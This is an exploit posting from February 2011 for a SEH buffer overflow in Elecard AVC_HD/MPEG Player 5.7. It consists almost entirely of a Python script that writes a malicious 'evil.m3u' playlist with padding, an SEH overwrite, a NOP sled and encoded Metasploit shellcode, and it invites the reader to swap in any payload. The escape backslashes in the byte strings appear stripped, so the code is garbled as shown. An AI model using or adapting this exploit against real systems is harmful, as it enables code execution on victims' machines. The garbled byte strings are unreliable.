Elecard AVC_HD/MPEG Player 5.7 Buffer Overflow
Posted on 28 February 2011
#!/usr/bin/env python # Software: Elecard AVC_HD/MPEG Player 5.7 (SEH) # Author: sickness # Download : http://www.elecard.com/en/products/end-user-software/playback/avchd-player.html # PoC for Elecard MPEG: http://www.exploit-db.com/exploits/16237/ # Tested : Windows XP Professional SP3 (EN) latest updates # DATE : 26/02/2011 # Bad chars: x00x0ax0dx25x68x08 There might be more so watch out ! ################################################################### # You might need to change the offset. # The payload can be replaced with whatever you want, there is enough space. ################################################################### import sys header="#EXTM3U " junk="x42"*4 nseh="xebx06x90x90" seh="xA6xA0x94x73" # p/p/r from D3DIM700.DLL nops = "x90"*16 # msfpayload windows/exec CMD=calc.exe R | msfencode -a x86 -b "x00x0ax0dx25x68x08" -t c sc = ("x6ax32x59xd9xeexd9x74x24xf4x5bx81x73x13xfdx1e" "x9fxecx83xebxfcxe2xf4x01xf6x16xecxfdx1exffx65" "x18x2fx4dx88x76x4cxafx67xafx12x14xbexe9x95xed" "xc4xf2xa9xd5xcaxccxe1xaex2cx51x22xfex90xffx32" "xbfx2dx32x13x9ex2bx1fxeexcdxbbx76x4cx8fx67xbf" "x22x9ex3cx76x5exe7x69x3dx6axd5xedx2dx4ex14xa4" "xe5x95xc7xccxfcxcdx7cxd0xb4x95xabx67xfcxc8xae" "x13xccxdex33x2dx32x13x9ex2bxc5xfexeax18xfex63" "x67xd7x80x3axeax0exa5x95xc7xc8xfcxcdxf9x67xf1" "x55x14xb4xe1x1fx4cx67xf9x95x9ex3cx74x5axbbxc8" "xa6x45xfexb5xa7x4fx60x0cxa5x41xc5x67xefxf5x19" "xb1x97x1fx12x69x44x1ex9fxecxadx76xaex67x92x99" "x60x39x46xeex2ax4exabx76x39x79x40x83x60x39xc1" "x18xe3xe6x7dxe5x7fx99xf8xa5xd8xffx8fx71xf5xec" "xaexe1x4ax8fx9cx72xfcxc2x98x66xfaxec") rest = "x90"*(21000-len(header+junk+nseh+seh+nops+sc)) exploit = header +junk + nseh + seh + nops + sc + rest try: f=open("evil.m3u","w") f.write(exploit) f.close() print "Done!" except: print "Something went wrong!"
